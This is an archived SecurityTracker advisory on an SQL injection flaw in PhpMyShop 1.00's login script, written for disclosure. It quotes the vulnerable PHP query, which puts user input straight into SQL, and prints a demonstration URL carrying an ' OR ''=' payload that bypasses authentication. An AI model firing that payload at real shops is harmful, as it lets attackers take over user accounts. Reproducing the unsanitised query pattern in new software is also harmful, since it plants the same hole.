SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   PhpMyShop Vendors:   Desaunay, Julien
PhpMyShop SQL Injection Flaw Allows Remote Users to Gain Access to the System
SecurityTracker Alert ID:  1006030
SecurityTracker URL:  http://securitytracker.com/id/1006030
CVE Reference:   CVE-2003-1532   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Feb 3 2003
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.00
Description:   A vulnerability was reported in PhpMyShop. A remote user can login as another user on the system.

Frog-m@n reported that the 'compte.php' script does not properly filter user-supplied input. A remote user can supply a URL with specially crafted values for the '$identifiant' and '$password' variables to be successfully authenticated by the system. The values for these variables can cause a faulty SQL statement that determines authentication success to be incorrectly evaluated as 'TRUE', granting access. The '$identifiant' value will determine which user account is accessed.

A demonstration exploit URL is provided:

http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='

Impact:   A remote user can gain access to user accounts on the system.
Solution:   No vendor solution was available at the time of this entry. The author of the report has released an unofficial patch, available at:

http://www.phpsecure.info/

Vendor URL:  www.pc-encheres.com/ (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] phpMyShop (php)




Informations :
Version : 1.00
Website : http://www.pc-encheres.com
Problem : SQL Injection


PHP Code/Location :
compte.php :
---------------------------------------------------------------
<?
session_start();

if (isset($achat))
{
session_register("achat");
}
else
{
header("location:index.php");
}

include("design/header.php");
require("config.php");
require("fonction.php");

echo"<td bgcolor=\"$barre1\"><font color=\"$police3\" 
size=\"$width_police2\"><strong>Identification</strong></font></td>
  </tr>
  <tr>
    <td><br>";

if (isset($valider))
{
$sql = "SELECT id_cli,login_cli,pass_cli FROM $table_client where 
login_cli='$identifiant' and pass_cli='$password'";
$sql = mysql_db_query($base,$sql);
$test = mysql_num_rows($sql);
if ($test=="0")
{
?>
<script language="javascript">
alert("Identifiant ou mot de passe non valide!");
</script>
<?
echo"<center><strong>Identifiant ou mot de passe non 
valide!</strong></center><br>";
}
else
{
$id_membre = mysql_result($sql,0,"id_cli");
session_register("id_membre");
?>
<script language="javascript">
document.location.href="valide.php"
</script>
<?
}
}

[...]
---------------------------------------------------------------



Exploit :
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='


Solution :
A patch has been published on http://www.phpsecure.info .



More details :
In French :
http://www.frog-man.org/tutos/phpmyshop.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools



frog-m@n


_________________________________________________________________
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! 
http://www.fr.msn.be/gsm/servicesms/hotmailparsms



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC